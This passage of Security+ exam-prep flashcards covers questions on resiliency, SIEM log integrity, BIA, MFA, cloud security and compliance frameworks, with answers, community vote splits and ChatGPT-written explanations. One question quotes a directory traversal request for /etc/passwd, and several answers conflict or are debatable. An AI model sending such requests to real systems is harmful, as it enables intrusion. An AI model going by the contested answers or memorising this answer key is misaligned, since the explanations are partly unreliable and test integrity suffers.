Clean Desk Policy: This policy ensures that sensitive information, documents, and equipment are not left unattended or visible when not in use. It minimizes the risk of visitors or unauthorized individuals accessing or capturing confidential information during SOC tours. By keeping workspaces clear of unnecessary items, especially when tours are being conducted, the chances of accidental exposure or intentional data theft are significantly reduced.

Let’s briefly review the other options:

Password complexity: While important for securing access to systems, this policy does not directly address the physical security risks associated with tours of the SOC.

Acceptable use: This policy governs the appropriate use of organizational resources by employees. While crucial, it does not specifically mitigate the risks associated with physical tours of the SOC.

Access control: Access control policies are essential for managing who can enter and interact with various systems and areas. However, this option does not directly address the issue of securing physical spaces and preventing unauthorized access to sensitive information during tours.

Therefore, implementing a Clean Desk Policy is the most effective measure to mitigate the risk of malicious activity following SOC tours by ensuring that sensitive information is not exposed to visitors.

26
Q

A Chief Information Security Officer has defined resiliency requirements for a new data center architecture. The requirements are as follows:

-Critical fileshares will remain accessible during and after a natural disaster.
-Five percent of hard disks can fail at any given time without impacting the data.
-Systems will be forced to shut down gracefully when battery levels are below 20%.

Which of the following are required to BEST meet these objectives? (Choose three.)

a. Fiber switching
b. IaC
c. NAS
d. RAID
e. UPS
f. Redundant power supplies
g. Geographic dispersal
h. Snapshots
i. Load balancing

A

(Community DEG 79%)

d. RAID
e. UPS
g. Geographic dispersal

Here’s why:

RAID (Redundant Array of Independent Disks): This meets the requirement of allowing up to five percent of hard disks to fail without impacting the data. RAID configurations provide disk redundancy and fault tolerance.

UPS (Uninterruptible Power Supply): This ensures that systems will be forced to shut down gracefully when battery levels are below 20%. A UPS provides backup power and can manage safe shutdowns during power outages.

Geographic dispersal: This ensures that critical fileshares will remain accessible during and after a natural disaster. By distributing data centers geographically, the risk of a single natural disaster affecting all data centers is minimized, enhancing availability and disaster recovery capabilities.

The other options are beneficial for overall infrastructure but do not directly address the specific resiliency requirements outlined:

Fiber switching: Improves network performance and redundancy but does not directly relate to the specified requirements.
IaC (Infrastructure as Code): Enhances deployment and management efficiency but does not directly address the specific resiliency requirements.
NAS (Network Attached Storage): Provides centralized storage but does not inherently offer the resiliency required.
Redundant power supplies: Improve power redundancy but do not specifically ensure a graceful shutdown or data accessibility during a disaster.
Snapshots: Provide data backups but do not ensure continuous availability during a disaster.
Load balancing: Distributes workloads but does not directly address the specified resiliency requirements.
27
Q

Which of the following is a security best practice that ensures the integrity of aggregated log files within a SIEM?

a. Set up hashing on the source log file servers that complies with local regulatory requirements.
b. Back up the aggregated log files at least two times a day or as stated by local regulatory requirements.
c. Write protect the aggregated log files and move them to an isolated server with limited access.
d. Back up the source log files and archive them for at least six years or in accordance with local regulatory requirements.

A

(Community : A 52%, C 48%)
c. Write protect the aggregated log files and move them to an isolated server with limited access.

The question asks about integrity of the AGGREGATE logs. Answer choice A only mentions hashing the source logs. Either way, hashing does not provide integrity. Rather, hashing will detect whether or not the integrity of a particular piece of data is maintained, but hashing on it’s own will not ENSURE the integrity. You need a preventative control, which would be storing on a write-protected server.

Here’s a breakdown of why option C is the best choice for ensuring the integrity of aggregated log files within a Security Information and Event Management (SIEM) system:

Write Protection: This prevents any modifications to the log files after they are created. Once logs are written, protecting them from changes ensures that the data remains trustworthy and tamper-proof.
Isolated Server with Limited Access: By storing the logs on an isolated server, you reduce the risk of unauthorized access and potential tampering. Limited access control ensures that only designated personnel can interact with the logs, further securing the integrity of the data.

c. Write protect the aggregated log files and move them to an isolated server with limited access.
Explanation:

Ensuring the integrity of aggregated log files within a SIEM (Security Information and Event Management) system is crucial for accurate incident detection, investigation, and compliance. Here’s why option (c) is the best practice:

Write protection: Prevents unauthorized modifications to the log files, ensuring that once logs are aggregated and written, they cannot be altered. This is critical for maintaining their integrity.

Isolated server with limited access: By moving the log files to an isolated server, the risk of tampering or unauthorized access is significantly reduced. Limited access ensures that only authorized personnel can interact with the log files, further protecting their integrity.

Here’s why other options are less suitable:

Set up hashing on the source log file servers: While hashing can help verify integrity, it does not prevent tampering. If an attacker can modify the log files, they might also be able to update the hashes.

Back up the aggregated log files: While backups are important for recovery, they do not ensure integrity on their own. If the log files are tampered with before backup, the backups will contain the tampered data.

Back up the source log files: This practice is related to data retention and recovery, not specifically to ensuring the integrity of aggregated logs within a SIEM.

Therefore, write protecting the aggregated log files and moving them to an isolated server with limited access is the most effective practice for maintaining the integrity of log files within a SIEM system.

28
Q

A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company’s cloud environment. Which of the following is an immediate consequence of these integrations?

a. Non-compliance with data sovereignty rules
b. Loss of the vendors interoperability support
c. Mandatory deployment of a SIEM solution
d. Increase in the attack surface

A

d. Increase in the attack surface

Explanation:

Increase in the attack surface: Integrating multiple security solutions typically involves installing additional agents, connectors, or APIs to gather data from various cloud services and resources. Each integration introduces potential vulnerabilities that attackers could exploit. These vulnerabilities may arise from misconfigurations, insecure APIs, or weaknesses in the security solutions themselves. Therefore, the more integrations and agents are deployed, the broader the attack surface becomes, increasing the potential avenues for attackers to target and compromise the organization's cloud environment.

Let’s briefly discuss why the other options are not immediate consequences in this context:

Option a: Non-compliance with data sovereignty rules could occur if data is processed or stored in a manner that violates regulatory requirements, but this is not necessarily an immediate consequence of integrating security solutions.

Option b: Loss of vendor interoperability support could be a risk in the long term if vendors do not support the integration or if compatibility issues arise, but it is not an immediate consequence of integration.

Option c: Mandatory deployment of a SIEM solution may be a strategic decision to centralize and analyze security logs, but it is not an immediate consequence of integrating multiple security solutions.

Therefore, option d, an increase in the attack surface, is the most relevant and immediate consequence to consider when authorizing multiple security solutions to collect data from a company’s cloud environment.

29
Q

Which of the following explains why RTO is included in a BIA?

a. It identifies the amount of allowable downtime for an application or system.
b. It prioritizes risks so the organization can allocate resources appropriately.
c. It monetizes the loss of an asset and determines a break-even point for risk mitigation.
d. It informs the backup approach so that the organization can recover data to a known time.

A

a. It identifies the amount of allowable downtime for an application or system.

Explanation:

RTO (Recovery Time Objective) is a critical metric defined in a Business Impact Analysis (BIA) to determine the maximum acceptable downtime for a business process, application, or system. It helps in setting expectations regarding how quickly a system or process needs to be restored after a disruption or disaster.

Business Impact Analysis (BIA) is a process used to evaluate the potential effects of an interruption to critical business operations. It helps organizations prioritize their recovery efforts and allocate resources effectively based on the impact of various scenarios.

Option a correctly explains that RTO is included in a BIA because it specifies the allowable downtime, which is crucial for prioritizing recovery efforts and ensuring that the organization can resume operations within acceptable limits after a disruption.

Let’s briefly review why the other options are incorrect:

Option b: Prioritizing risks and allocating resources appropriately is more closely related to Risk Assessment and Management, not specifically to why RTO is included in a BIA.

Option c: Monetizing the loss of an asset and determining a break-even point is more aligned with Cost-Benefit Analysis and Financial Risk Assessment, not directly with the purpose of RTO in a BIA.

Option d: Informing the backup approach to recover data to a known time is related to Backup and Recovery Planning, but it does not specifically address why RTO is included in a BIA.

Therefore, the correct and most relevant explanation for why RTO is included in a BIA is to identify the allowable downtime for an application or system (option a).

30
Q

A security analyst is reviewing web-application logs and finds the following log:

https://www.comptia.org/contact-us/%3Ffile%3D..%2F..%2F..%Fetc%2Fpasswd

Which of the following attacks is being observed?

a. Directory traversal
b. XSS
c. CSRF
d. On-path attack

A

a. Directory traversal

Explanation:

Directory traversal (also known as path traversal) is a web security vulnerability that allows an attacker to access files and directories that are stored outside the web root folder. In the provided log entry:

perl

https://www.comptia.org/contact-us/%3Ffile%3D..%2F..%2F..%Fetc%2Fpasswd

%3F represents the URL encoding for ?.
%2F represents the URL encoding for /.
%F and %2F concatenated (%Fetc%2F) are part of the encoded attempt to traverse directories (../) to access the /etc/passwd file.

The presence of ..%2F..%2F..%Fetc%2Fpasswd in the URL indicates an attempt to go up multiple directory levels (..) from the current directory context, ultimately trying to access sensitive system files like /etc/passwd.

XSS (Cross-Site Scripting) involves injecting malicious scripts into web pages viewed by other users.

CSRF (Cross-Site Request Forgery) involves tricking a user into unknowingly executing actions on a web application.

On-path attack typically involves intercepting or manipulating traffic between a user and a web application.

31
Q

A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

a. Security patches were uninstalled due to user impact.
b. An adversary altered the vulnerability scan reports
c. A zero-day vulnerability was used to exploit the web server
d. The scan reported a false negative for the vulnerability

A

a. Security patches were uninstalled due to user impact.

Here’s why this is the most likely cause:

Uninstalled Security Patches: It is common for organizations to uninstall or roll back security patches if they cause unexpected issues or user impact, such as application failures or performance degradation. This action could leave the system vulnerable to known exploits, even though patches were previously available and possibly installed at one point.

Historical Scan Reports: The presence of the vulnerability in historical vulnerability scan reports suggests that at some point, the vulnerability was detected and possibly patched. If patches were later uninstalled, either intentionally or unintentionally, the vulnerability would reappear and potentially be exploitable.

User Impact Concerns: Security patches sometimes introduce compatibility issues or unexpected behavior in applications. In response to these issues, administrators may decide to uninstall or delay applying patches until they can be tested further or until an alternative solution is found. This decision, however, leaves the system exposed to known vulnerabilities.

The other options are less likely based on the information given:

b. Adversary altering scan reports: This is less likely unless there is evidence of compromise affecting the integrity of scan reports, which is not provided in the scenario.

c. Zero-day vulnerability: If it were a zero-day vulnerability, it would not be present in historical scan reports, as these vulnerabilities are unknown to the public and security vendors until they are exploited.

d. False negative in scan reports: While possible, historical reports showing the vulnerability before the incident suggests the vulnerability was previously detected, making it less likely to be a false negative.

Therefore, considering the scenario and the details provided, a. Security patches were uninstalled due to user impact is the most plausible cause for the vulnerability being present and exploitable on the web server.

32
Q

Which of the following is a known security risk associated with data archives that contain financial information?

a. Data can become a liability if archived longer than required by regulatory guidance.
b. Data must be archived off-site to avoid breaches and meet business requirements.
c. Companies are prohibited from providing archived data to e-discovery requests.
d. Unencrypted archives should be preserved as long as possible and encrypted.

A

a. Data can become a liability if archived longer than required by regulatory guidance.

Explanation:

Data archives that contain financial information pose several security risks, and among them, the most significant is the risk associated with regulatory compliance and retention requirements. Here’s why each option is correct or incorrect:

Option a: Data can become a liability if archived longer than required by regulatory guidance.
    This is a known security risk because regulatory frameworks often dictate specific retention periods for financial data. Keeping data longer than necessary can lead to legal and compliance issues, as well as increased exposure to data breaches and misuse.

Option b: Data must be archived off-site to avoid breaches and meet business requirements.
    While off-site storage is a common practice for disaster recovery and business continuity, it primarily addresses availability concerns rather than security risks associated with retention periods or compliance.

Option c: Companies are prohibited from providing archived data to e-discovery requests.
    This statement is incorrect because archived data is often subject to e-discovery requests as part of legal proceedings. However, the manner in which data is archived and the compliance with legal hold requirements are critical factors in responding to such requests.

Option d: Unencrypted archives should be preserved as long as possible and encrypted.
    This statement is incorrect because unencrypted archives pose significant security risks, especially for financial information. Archives should be encrypted to protect sensitive data from unauthorized access and breaches.

Therefore, option a is the best answer as it directly addresses the security risk associated with regulatory compliance and the potential liability of retaining financial data longer than necessary.

33
Q

Which of the following BEST describes the process of documenting who has access to evidence?

a. Order of volatility
b. Chain of custody
c. Non-repudiation
d. Admissibility

A

b. Chain of custody

Explanation:

Chain of custody refers to the documentation and procedures used to establish the history of an item of evidence. It tracks the movement and handling of evidence from the moment it is collected until it is presented in court or used in an investigation. This process ensures that the integrity of the evidence is maintained and can be verified, including who has accessed it and when.

Let’s briefly explain why the other options are not correct:

Order of volatility (a): This refers to the principle of preserving evidence in a sequence that captures volatile data first, such as RAM, which is more transient compared to persistent storage. It does not directly address documenting who has access to evidence.

Non-repudiation (c): This refers to the ability to prove that a specific party took a particular action and cannot deny having done so. It applies more to actions such as digital signatures and transactions, rather than to the documentation of physical or digital evidence access.

Admissibility (d): This refers to whether evidence is considered acceptable and valid in a court of law based on legal standards. It involves ensuring that evidence collection and handling procedures, including chain of custody, have been followed correctly, but it doesn't specifically address documenting who has access to evidence.

Therefore, chain of custody (b) is the process that specifically involves documenting and maintaining records of who has access to evidence throughout its handling and storage.

34
Q

A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.)

a. Private cloud
b. SaaS
c. Hybrid cloud
d. IaaS
e. DRaaS
f. Fog computing

A

(Community CF 66%, AF 28%)
c. Hybrid cloud
f. Fog computing

“Many people use the terms fog computing and edge computing interchangeably because both involve bringing intelligence and processing closer to where the data is created” - https://www.techtarget.com/iotagenda/definition/fog-computing-fogging

While a private cloud can provide security and control, it may not be as suitable for “low-latency” requirements in scenarios involving network-connected devices.

Hybrid cloud environments can also incorporate edge computing, which processes data closer to the source (devices) to reduce latency and improve performance.

(ChatGPT & Braindump)
c. Hybrid cloud
f. Fog computing
Explanation:

Hybrid cloud (c): A hybrid cloud architecture allows for the integration of private and public cloud services, providing flexibility to perform analytics closer to the endpoints (on-premises or in private cloud) while leveraging the scalability and resources of public cloud services for other tasks.

Fog computing (f): Fog computing extends cloud computing to the edge of the network, closer to devices and endpoints. It enables data processing and analytics to be performed locally on edge devices or in nearby servers, reducing latency and conserving bandwidth by minimizing the need to transmit raw data to distant cloud data centers.

Why the other options are not the best choices:

Private cloud (a): A private cloud typically does not address the need for low latency and bandwidth reduction directly between network-connected devices or endpoints. It focuses more on providing dedicated resources within a controlled environment.

SaaS (b): Software as a Service (SaaS) delivers software applications over the internet, but it does not inherently address the low latency and analytics requirements at the network level or endpoint level.

IaaS (d): Infrastructure as a Service (IaaS) provides virtualized computing resources over the internet, such as virtual machines and storage, but it does not specifically address the low latency and analytics requirements at the endpoint level.

DRaaS (e): Disaster Recovery as a Service (DRaaS) focuses on providing backup and recovery solutions, which is different from the requirements of low latency and endpoint analytics.

Therefore, hybrid cloud (c) and fog computing (f) are the most suitable options for meeting the specified requirements.

35
Q

Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization?

a. Asset management policy
b. Separation of duties policy
c. Acceptable use policy
d. Job rotation policy

A

d. Job rotation policy

Here’s why:

Job Rotation Policy: This policy involves periodically moving employees between different jobs or roles within the organization. It helps employees gain a broader understanding of various functions, processes, and responsibilities across the organization. This not only enhances individual skill sets but also fosters a more versatile and knowledgeable workforce, which can improve overall organizational resilience and capability.

The other options, while important, do not specifically aim to increase the depth and breadth of knowledge across the organization:

Asset management policy: Focuses on the management of the organization's assets, ensuring they are properly tracked, maintained, and utilized. It does not directly contribute to increasing employee knowledge across different areas.

Separation of duties policy: Aims to reduce the risk of fraud and errors by ensuring that no single individual has control over all aspects of any critical process. While it enhances security and accountability, it does not necessarily promote broader knowledge among employees.

Acceptable use policy: Outlines the proper use of organizational resources and systems by employees. It helps ensure security and appropriate behavior but does not directly contribute to increasing knowledge across different areas of the organization.
36
Q

A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?

a. WAF
b. CASB
c. VPN
d. TLS

A

b. CASB (Cloud Access Security Broker)

Here’s why CASB is the most suitable choice:

Tokenization Capability: CASB solutions can integrate with cloud environments to provide tokenization services. Tokenization replaces sensitive data (such as credit card numbers) with unique identification symbols (tokens) that retain essential information without exposing the actual data.

Control Over Data Access: CASBs offer granular control over data access and visibility in cloud environments. This includes policies that can restrict or monitor access to sensitive data, ensuring that the cloud provider does not have visibility into the original credit card information.

Compliance and Security: CASBs are designed to enforce security policies across cloud services, ensuring compliance with regulatory requirements (such as PCI DSS for handling credit card information). This helps in maintaining data privacy and security while using cloud services.

In contrast, the other options:

WAF (Web Application Firewall): While important for web application security, WAF primarily focuses on filtering and monitoring HTTP traffic to and from a web application. It does not directly address the tokenization or data visibility requirements mentioned.

VPN (Virtual Private Network): VPNs are used to create secure, encrypted connections over a less secure network (like the internet). While they provide secure communication channels, they do not inherently tokenize data or control data visibility within a cloud environment.

TLS (Transport Layer Security): TLS provides encryption for data in transit between clients and servers. While essential for securing data in transit, it does not address tokenization or control data visibility within cloud storage.

Therefore, CASB is the best option as it directly addresses the requirement to tokenize credit card data while ensuring the cloud provider does not have visibility into the sensitive information stored in the cloud environment.

37
Q

A security analyst is tasked with defining the “something you are” factor of the company’s MFA settings. Which of the following is BEST to use to complete the configuration?

a. Gait analysis
b. Vein
c. Soft token
d. HMAC-based, one-time password

A

b. Vein

Here’s why vein is the best choice:

Biometric Authentication: Vein recognition is a form of biometric authentication that identifies individuals based on the patterns of veins in their hands or fingers. It is a highly secure method because vein patterns are unique to each individual and difficult to replicate or steal compared to other biometric features like fingerprints.

Accuracy and Reliability: Vein recognition technology is known for its high accuracy and reliability. It is less susceptible to spoofing or false positives compared to other biometric methods like facial recognition or voice recognition.

Non-intrusive: Unlike gait analysis, which requires observing and analyzing how a person walks, vein recognition can be done discreetly using near-infrared light to capture vein patterns beneath the skin's surface. This makes it a more practical and user-friendly choice for MFA implementations.

Compliance and Security: Vein recognition meets stringent security requirements for MFA, especially in environments where high levels of security are necessary, such as accessing sensitive systems or data.

In contrast:

Gait analysis involves analyzing the way a person walks to identify them, which is more complex to implement and may not be as widely supported or accurate as vein recognition.

Soft token and HMAC-based one-time password (OTP) are typically used as the "something you have" factor in MFA, where soft tokens generate OTPs and HMAC-based OTPs are cryptographic tokens generated by hardware or software.

Therefore, based on the requirement to define the “something you are” factor for MFA, b. Vein recognition offers a robust and secure biometric authentication method suitable for this purpose.

38
Q

Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?

a. Pulverizing
b. Overwriting
c. Shredding
d. Degaussing

A

b. Overwriting

Overwriting is a process where data on a storage device (such as a hard drive or solid-state drive) is replaced with new data multiple times, effectively erasing the original data. This method allows the storage device to be reused afterward because the existing data is no longer recoverable. Overwriting typically involves writing random patterns of data over the entire storage area multiple times to ensure that the previous data cannot be reconstructed.

Here’s a brief explanation of the other options:

Pulverizing: This involves physically destroying the storage device into small pieces or powder, rendering it unusable and ensuring that data cannot be recovered.

Shredding: Similar to pulverizing, shredding involves physically destroying the storage device, usually into small pieces or strips, to prevent data recovery.

Degaussing: This method uses a strong magnetic field to disrupt the magnetic domains on magnetic storage devices (such as hard drives or tapes), effectively erasing the data. However, it typically renders the storage device unusable for future data storage.

Therefore, while all methods can effectively eliminate data, overwriting specifically allows the storage device to be reused after the process, making it the correct choice for scenarios where the device needs to be repurposed or reused securely.

39
Q

A user’s account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM:

Time Log Message
9:00:00 AM login: user password: aBG23TMV
9:00:01 AM login: user password: aBG33TMV
9:00:02 AM login: user password: aBG43TMV
9:00:03 AM login: user password: aBG53TMV

Which of the following describes what is occurring?

a. An attacker is utilizing a password-spraying attack against the account.
b. An attacker is utilizing a dictionary attack against the account.
c. An attacker is utilizing a brute-force attack against the account.
d. An attacker is utilizing a rainbow table attack against the account.

A

c. An attacker is utilizing a brute-force attack against the account.

40
Q

A web server has been compromised due to a ransomware attack. Further investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state?

a. The last incremental backup that was conducted 72 hours ago
b. The last known-good configuration
c. The last full backup that was conducted seven days ago
d. The baseline OS configuration

A

b. The last known-good configuration

(Community C 57%, B 22%, A 20%)
(Braindump : a. The last incremental backup that was conducted 72 hours ago)

ChatGPT
b. The last known-good configuration

Explanation :
a. The last incremental backup that was conducted 72 hours ago:

This backup might contain some data up to 72 hours ago, but it could potentially include encrypted files if the ransomware had already infiltrated the server at that time. It may not fully address the current compromised state.

b. The last known-good configuration:

This option involves restoring from a configuration backup that was known to be secure before the ransomware attack occurred. It can help in restoring the server to a state where the ransomware was not present.

c. The last full backup that was conducted seven days ago:

This backup is likely older and would result in data loss of up to seven days. It may not be ideal if frequent updates or transactions have occurred since the last backup.

d. The baseline OS configuration:

This involves restoring the server to its initial state or a standard configuration known to be secure. It ensures that all system settings are reverted to a secure state, potentially removing any residual effects of the ransomware.

Best Choice:

b. The last known-good configuration

Restoring from the last known-good configuration ensures that the server is reverted to a state before the ransomware infection. It provides a higher likelihood of removing the ransomware and restoring the server to a secure and operational state without the risk of reinfection from compromised backups or data.

Therefore, option b is the most appropriate choice to restore services to a secure state promptly after a ransomware attack.

41
Q

A network engineer created two subnets that will be used for production and development servers. Per security policy production and development servers must each have a dedicated network that cannot communicate with one another directly. Which of the following should be deployed so that server administrators can access these devices?

a. VLANs
b. Internet proxy servers
c. NIDS
d. Jump servers

A

d. Jump servers

Here’s why this solution is appropriate:

Access Control: A bastion host is a dedicated server that acts as a gateway to access other servers in separate security zones (in this case, production and development). It allows administrators to securely connect to servers in each subnet without allowing direct communication between the subnets.

Security Isolation: By using a bastion host, you enforce access controls and isolate the production and development environments. Administrators must authenticate themselves to the bastion host, which then manages access to servers in each subnet based on defined security policies.

Auditability: All administrative access can be logged and audited from the bastion host, providing a clear record of who accessed which servers and when, enhancing security and compliance.

Simplicity and Management: Managing access through a single entry point (bastion host) simplifies network security management compared to allowing direct connectivity between subnets, which can be more complex to secure and monitor.

Therefore, deploying a bastion host or jump server is the recommended approach to enable server administrators to access devices in both the production and development subnets while maintaining the required network isolation and security.

42
Q

A social media company based in North America is looking to expand into new global markets and needs to maintain compliance with international standards.
With which of the following is the company’s data protection officer MOST likely concerned?

a. NIST Framework
b. ISO 27001
c. GDPR
d. PCI-DSS

A

c. GDPR (General Data Protection Regulation).

Here’s why:

GDPR: This regulation is focused on protecting the personal data and privacy of individuals within the European Union (EU) and the European Economic Area (EEA). It applies to organizations outside the EU/EEA that offer goods or services to, or monitor the behavior of, EU/EEA data subjects. Since the company is expanding globally, including into regions covered by GDPR, compliance with its stringent requirements regarding data privacy and security is crucial.

NIST Framework: While the NIST Cybersecurity Framework is widely recognized and used for cybersecurity risk management in the United States, its adoption is not mandatory by law or regulation in international markets. It is more of a guideline and framework rather than a legal compliance requirement.

ISO 27001: This standard provides requirements for establishing, implementing, maintaining, and continually improving an information security management system (ISMS). While ISO 27001 is widely respected globally, it focuses on information security management rather than specific data privacy requirements.

PCI-DSS: The Payment Card Industry Data Security Standard (PCI-DSS) is applicable primarily to organizations that handle credit card transactions. While important for payment security, it does not comprehensively cover data protection concerns related to global expansion and compliance with international data privacy regulations like GDPR.

Therefore, given the global expansion and the need to comply with stringent data protection laws affecting international markets, the company’s data protection officer would be most concerned with ensuring compliance with GDPR.

43
Q

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to BEST meet the requirement?

a. Fog computing and KVMs
b. VDI and thin clients
c. Private cloud and DLP
d. Full drive encryption and thick clients

A

b. VDI (Virtual Desktop Infrastructure) and thin clients.

Here’s why this option is suitable:

VDI: Virtual Desktop Infrastructure allows users to access virtualized desktops hosted on servers in the data center. This means that the sensitive data remains centralized in the data center and is never stored or cached on the local workstations (thin clients) in the conference rooms. Users interact with their virtual desktop sessions over the network, and all data processing and storage occur centrally.

Thin clients: These are endpoint devices (workstations in the conference rooms) that are lightweight and designed to rely on the server-hosted virtual desktops. They have minimal storage and processing capabilities of their own, ensuring that no sensitive data is stored locally.

This solution ensures that:

Sensitive data remains under centralized control in the data center, reducing the risk of data exposure in the conference rooms.
Users can securely access and display sensitive data without the need for local storage or processing.
It aligns with the requirement of not storing sensitive data in the conference rooms, as all data handling is done within the secure environment of the data center.

Therefore, VDI and thin clients provide a secure and efficient solution for displaying sensitive data in conference rooms while maintaining compliance with data protection requirements.

44
Q

A Chief Information Security Officer wants to ensure the organization is validating and checking the integrity of zone transfers. Which of the following solutions should be implemented?

a. DNSSEC
b. LDAPS
c. NGFW
d. DLP

A

a. DNSSEC (Domain Name System Security Extensions).

Explanation:

DNSSEC: DNSSEC is designed to protect the integrity and authenticity of DNS data. It uses cryptographic signatures to ensure that DNS responses (including zone transfers) have not been tampered with. By signing DNS data, DNSSEC provides a way to verify that the information received from a DNS server is authentic and has not been altered in transit.

Implementing DNSSEC ensures that:

DNS responses, including zone transfers, are authenticated and their integrity is validated.
It mitigates the risk of DNS spoofing or cache poisoning attacks.
It provides an additional layer of security for DNS infrastructure by ensuring that any changes or transfers of DNS zone data are verified and trusted.

Therefore, DNSSEC is the solution that should be implemented to validate and check the integrity of zone transfers.

LDAPS (Lightweight Directory Access Protocol Secure):

Purpose: LDAPS is used for securing directory services, such as those provided by Active Directory. It encrypts LDAP traffic to ensure confidentiality and integrity during communication.
Why Not Suitable: LDAPS does not deal with DNS or DNS zone transfers. Its primary use is for directory services, not DNS.

NGFW (Next-Generation Firewall):

Purpose: NGFWs provide advanced filtering capabilities, including application awareness, intrusion prevention, and deep packet inspection.
Why Not Suitable: While NGFWs enhance network security, they do not specifically address the integrity and authentication of DNS zone transfers. They are more about protecting the network perimeter and internal network traffic.

DLP (Data Loss Prevention):

Purpose: DLP solutions are designed to prevent the unauthorized transfer of sensitive data outside the organization. They monitor, detect, and block potential data breaches.
Why Not Suitable: DLP focuses on preventing data leaks and protecting sensitive information, not on DNS operations or ensuring the integrity of DNS zone transfers.
45
Q

Which of the following controls is used to make an organization initially aware of a data compromise?

a. Protective
b. Preventative
c. Corrective
d. Detective

A

d. Detective

Explanation:

Detective Controls: These controls are designed to identify and alert on incidents or breaches as they occur. They monitor systems, networks, and activities to detect suspicious or malicious behavior. Examples include intrusion detection systems (IDS), security information and event management (SIEM) systems, and log monitoring.

Why not the others?:

Protective Controls: This is not a standard term in security controls. It seems to overlap with preventative or detective controls.
Preventative Controls: These controls are designed to prevent security incidents from occurring in the first place. Examples include firewalls, anti-virus software, and access control mechanisms. They aim to block or mitigate potential threats before they can cause harm.
Corrective Controls: These controls are implemented to correct or mitigate the effects of an incident after it has occurred. Examples include patch management, data recovery processes, and incident response plans.

Detective controls are specifically focused on discovering and alerting about ongoing or past security incidents, making them the correct choice for being initially aware of a data compromise.

46
Q

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be BEST to use to update and reconfigure the OS-level security configurations?

a. CIS benchmarks
b. GDPR guidance
c. Regional regulations
d. ISO 27001 standards

A

a. CIS benchmarks

Explanation:

CIS (Center for Internet Security) benchmarks: These are globally recognized security standards and best practices for securing IT systems and data. They provide detailed configuration guidelines for various operating systems, applications, and network devices. Using CIS benchmarks ensures that OS-level configurations are updated to the latest and most secure settings.

Why not the others?:

GDPR guidance: The General Data Protection Regulation (GDPR) is primarily focused on data protection and privacy for individuals within the European Union. It does not provide specific guidelines for OS-level configurations or security hardening.
Regional regulations: These may include various legal requirements depending on the region, but they are typically not specific or detailed enough to guide the hardening of OS configurations. They often focus on broader compliance issues rather than specific technical configurations.
ISO 27001 standards: ISO 27001 is a standard for information security management systems (ISMS). While it provides a framework for managing information security, it does not offer specific, detailed configuration guidelines for operating systems.

CIS benchmarks are specifically designed to provide detailed and actionable guidance on securing OS-level configurations, making them the most appropriate choice for addressing the findings of an information security assessment.

47
Q

A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The company wants to make sure that performance and security remain intact. Which of the following BEST meets both requirements?

a. High availability
b. Application security
c. Segmentation
d. Integration and auditing

A

(Community : D 45%, C 43%)
(Braindump : D )
d. Integration and auditing

The company is transitioning network services to the cloud (they also just acquired several other small companies). The company’s primary focus in this scenario is to ensure performance and security REMAIN intact.

The key word: “remain intact” meaning they already have strong performance and security but they want this to continue while transitioning these additional companies and their network services to the cloud.

ChatGPT
c. Segmentation

Explanation:

Segmentation: This involves dividing a network into multiple smaller segments or subnets, each with its own set of security policies and controls. Segmentation can help improve both performance and security by isolating different parts of the network, reducing the attack surface, and limiting the spread of potential security breaches. By isolating critical services and workloads, segmentation ensures that performance issues in one segment do not affect others, and it also helps in containing and managing security incidents more effectively.

Why not the others?:

High availability: While high availability ensures that systems remain operational with minimal downtime, it primarily addresses performance and reliability, not security.
Application security: This focuses on securing applications from threats and vulnerabilities. While important, it does not address the broader network-level security and performance concerns that segmentation does.
Integration and auditing: These are important for ensuring that systems work well together and for maintaining logs and records for compliance and monitoring. However, they do not directly address the need to optimize both performance and security across the network.

By implementing segmentation, the company can ensure that its network remains both secure and performs efficiently as it transitions services to the cloud and integrates the newly acquired companies.

(Braindump : d. Integration and auditing)

48
Q

After a recent external audit, the compliance team provided a list of several non-compliant, in-scope hosts that were not encrypting cardholder data at rest. Which of the following compliance frameworks would address the compliance team’s GREATEST concern?

a. PCI DSS
b. GDPR
c. ISO 27001
d. NIST CSF

A

a. PCI DSS

Explanation:

PCI DSS (Payment Card Industry Data Security Standard): This framework specifically addresses the security of cardholder data. One of its core requirements is the protection of stored cardholder data, which includes encrypting cardholder data at rest to ensure its confidentiality and integrity.

Why not the others?:

GDPR (General Data Protection Regulation): While GDPR emphasizes the protection of personal data and includes provisions for data encryption, its primary focus is on the privacy and rights of individuals in the European Union. It does not specifically target cardholder data security.
ISO 27001: This is an international standard for information security management systems (ISMS). While it provides a comprehensive framework for managing security risks and includes controls for data protection, it is not specifically focused on cardholder data.
NIST CSF (National Institute of Standards and Technology Cybersecurity Framework): This framework provides guidelines for managing and reducing cybersecurity risks but is more general in nature. It is not specifically designed to address the requirements for protecting cardholder data.
49
Q

A security analyst is receiving several alerts per user and is trying to determine if various logins are malicious. The security analyst would like to create a baseline of normal operations and reduce noise. Which of the following actions should the security analyst perform?

a. Adjust the data flow from authentication sources to the SIEM.
b. Disable email alerting and review the SIEM directly.
c. Adjust the sensitivity levels of the SIEM correlation engine.
d. Utilize behavioral analysis to enable the SIEM’s learning mode.

A

d. Utilize behavioral analysis to enable the SIEM’s learning mode.

Explanation:

Utilize behavioral analysis to enable the SIEM's learning mode: This approach allows the SIEM to learn what constitutes normal behavior for users and systems over time. By establishing a baseline of normal operations, the SIEM can more effectively distinguish between typical activities and potential anomalies, thus reducing false positives and noise in the alerts.

Why not the others?:

Adjust the data flow from authentication sources to the SIEM: While this could help manage the volume of data, it does not address the issue of distinguishing between normal and malicious activities.
